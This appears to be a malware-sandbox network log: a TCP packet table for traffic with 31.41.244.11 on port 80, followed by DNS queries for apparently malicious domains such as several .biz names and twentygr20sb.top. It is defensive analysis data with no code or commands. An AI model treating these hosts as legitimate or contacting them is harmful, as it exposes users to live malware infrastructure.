Dec 16, 2024 11:03:34.050456047 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.050462008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.050498009 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.050515890 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.050554037 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.050569057 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.050631046 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.051465988 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.051516056 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.051569939 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.051604986 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.051629066 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.051647902 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.051676035 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.051728010 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.052400112 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.052448988 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.052500963 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.052535057 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.052544117 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.052572012 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.052581072 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.052617073 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.052860022 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.052910089 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.052916050 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.052953005 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.052963972 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.052989006 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.052998066 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.053039074 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.053582907 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.053633928 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.053637028 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.053673983 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.053682089 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.053719997 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.053745031 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.053792953 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.054390907 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.054445028 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.054445028 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.054481983 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.054496050 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.054522991 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.054549932 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.054594040 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.055166006 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.055238962 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.055241108 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.055278063 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.055289984 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.055326939 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.055332899 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.055372953 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.055960894 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.056011915 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.056016922 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.056052923 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.056062937 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.056097031 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.056122065 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.056165934 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.056790113 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.056844950 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.056868076 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.056901932 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.056921005 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.056948900 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.056971073 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.057024002 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.057553053 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.057600021 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.057606936 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.057641983 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.057651997 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.057687044 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.057712078 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.057758093 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.058376074 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.058423996 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.058432102 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.058470011 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.058475018 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.058514118 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.058538914 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.058585882 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.059257030 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.059293032 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.059307098 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.059339046 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.059348106 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.059386015 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.059390068 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.059432983 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.059983969 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.060033083 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.060065985 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.060101032 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.060115099 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.060137033 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.060146093 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.060183048 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.060704947 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.060755014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.060762882 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.060798883 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.060805082 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.060836077 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.060843945 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.060879946 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.061518908 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.061573029 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.061573982 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.061609983 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.061626911 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.061645031 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.061659098 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.061691046 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.062315941 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.062369108 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.062370062 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.062407017 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.062416077 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.062454939 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.062474966 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.062521935 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.063175917 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.063210964 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.063220978 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.063249111 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.063251972 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.063286066 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.063294888 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.063335896 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.063915014 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.063961983 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.063970089 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.064006090 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.064014912 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.064040899 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.064058065 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.064088106 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.236394882 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.236478090 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.236515999 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.236521006 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.236558914 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.236592054 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.236592054 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.236599922 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.236605883 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.236648083 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.236711025 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.236751080 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.236771107 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.236789942 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.236802101 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.236841917 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.237415075 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.237471104 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.237473011 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.237512112 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.237525940 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.237551928 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.237562895 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.237601995 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.238261938 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.238321066 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.238389015 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.238425970 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.238444090 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.238464117 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.238471031 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.238517046 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.238997936 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.239053011 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.239053965 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.239092112 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.239140987 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.239154100 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.239161968 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.239222050 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.239835978 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.239895105 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.239897013 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.239933014 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.239952087 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.239968061 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.239975929 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.240014076 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.240597963 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.240655899 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.240712881 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.240750074 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.240772009 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.240787029 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.240803003 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.240839005 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.241357088 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.241415024 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.241416931 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.241453886 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.241472006 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.241508961 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.241637945 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.241694927 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.242202997 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.242260933 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.242316008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.242352009 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.242372990 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.242398977 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.242422104 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.242470980 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.243057966 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.243114948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.243115902 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.243151903 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.243175030 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.243192911 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.243205070 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.243246078 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.243896008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.243954897 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.243957043 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.243992090 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.244010925 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.244029999 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.244040012 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.244080067 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.244541883 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.244596958 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.244647026 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.244683027 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.244704962 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.244719028 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.244729996 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.244766951 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.245345116 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.245402098 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.245472908 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.245511055 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.245528936 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.245547056 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.245558977 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.245595932 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.246156931 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.246217012 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.246252060 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.246289015 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.246309996 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.246325016 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.246345997 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.246381998 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.246917009 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.246989012 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.247030020 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.247067928 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.247086048 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.247103930 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.247121096 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.247158051 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.247694969 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.247752905 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.247801065 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.247836113 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.247853041 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.247873068 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.247879982 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.247939110 CET	49833	80	192.168.2.5	31.41.244.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 16, 2024 11:03:15.810491085 CET	192.168.2.5	1.1.1.1	0x6f43	Standard query (0)	drive-connect.cyou	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:16.139307022 CET	192.168.2.5	1.1.1.1	0xf11d	Standard query (0)	se-blurry.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:16.367670059 CET	192.168.2.5	1.1.1.1	0xf80d	Standard query (0)	zinc-sneark.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:16.665182114 CET	192.168.2.5	1.1.1.1	0xaebd	Standard query (0)	dwell-exclaim.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:16.893085003 CET	192.168.2.5	1.1.1.1	0x7b87	Standard query (0)	formy-spill.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:17.686820984 CET	192.168.2.5	1.1.1.1	0x315f	Standard query (0)	covery-mover.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:17.909684896 CET	192.168.2.5	1.1.1.1	0xb62	Standard query (0)	dare-curbys.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:18.204353094 CET	192.168.2.5	1.1.1.1	0x15e8	Standard query (0)	print-vexer.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:18.421680927 CET	192.168.2.5	1.1.1.1	0x187c	Standard query (0)	impend-differ.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:18.664164066 CET	192.168.2.5	1.1.1.1	0x9f7e	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:26.542668104 CET	192.168.2.5	1.1.1.1	0xfd31	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:26.542716980 CET	192.168.2.5	1.1.1.1	0x16a	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 16, 2024 11:03:30.349510908 CET	192.168.2.5	1.1.1.1	0x7732	Standard query (0)	home.twentygr20sb.top	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:30.349607944 CET	192.168.2.5	1.1.1.1	0x5971	Standard query (0)	home.twentygr20sb.top	28	IN (0x0001)	false
Dec 16, 2024 11:03:34.344248056 CET	192.168.2.5	1.1.1.1	0x716	Standard query (0)	home.twentygr20sb.top	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:34.344343901 CET	192.168.2.5	1.1.1.1	0x404	Standard query (0)	home.twentygr20sb.top	28	IN (0x0001)	false
Dec 16, 2024 11:03:43.532968044 CET	192.168.2.5	1.1.1.1	0xb239	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:45.693558931 CET	192.168.2.5	1.1.1.1	0x8e20	Standard query (0)	sedone.online	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:52.180319071 CET	192.168.2.5	1.1.1.1	0x57fb	Standard query (0)	tacitglibbr.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:58.601008892 CET	192.168.2.5	1.1.1.1	0x3201	Standard query (0)	twentygr20sb.top	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:58.601010084 CET	192.168.2.5	1.1.1.1	0xb5d0	Standard query (0)	twentygr20sb.top	28	IN (0x0001)	false
Dec 16, 2024 11:04:01.623168945 CET	192.168.2.5	1.1.1.1	0x2a77	Standard query (0)	twentygr20sb.top	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:01.623274088 CET	192.168.2.5	1.1.1.1	0x4ac1	Standard query (0)	twentygr20sb.top	28	IN (0x0001)	false
Dec 16, 2024 11:04:03.654272079 CET	192.168.2.5	1.1.1.1	0x6705	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:03.654443979 CET	192.168.2.5	1.1.1.1	0xb39f	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 16, 2024 11:04:27.909873009 CET	192.168.2.5	1.1.1.1	0x5f63	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:28.082978964 CET	192.168.2.5	1.1.1.1	0xc290	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 16, 2024 11:04:28.438045979 CET	192.168.2.5	1.1.1.1	0xb59e	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:28.444004059 CET	192.168.2.5	1.1.1.1	0x91	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:28.576630116 CET	192.168.2.5	1.1.1.1	0x6805	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:28.588249922 CET	192.168.2.5	1.1.1.1	0xa5a0	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:28.714390039 CET	192.168.2.5	1.1.1.1	0x431	Standard query (0)	youtube.com	28	IN (0x0001)	false
Dec 16, 2024 11:04:28.729415894 CET	192.168.2.5	1.1.1.1	0xcccb	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 16, 2024 11:04:29.894414902 CET	192.168.2.5	1.1.1.1	0xca79	Standard query (0)	example.org	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:29.894829988 CET	192.168.2.5	1.1.1.1	0xd296	Standard query (0)	ipv4only.arpa	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:29.939636946 CET	192.168.2.5	1.1.1.1	0x40d8	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:30.046562910 CET	192.168.2.5	1.1.1.1	0x5660	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
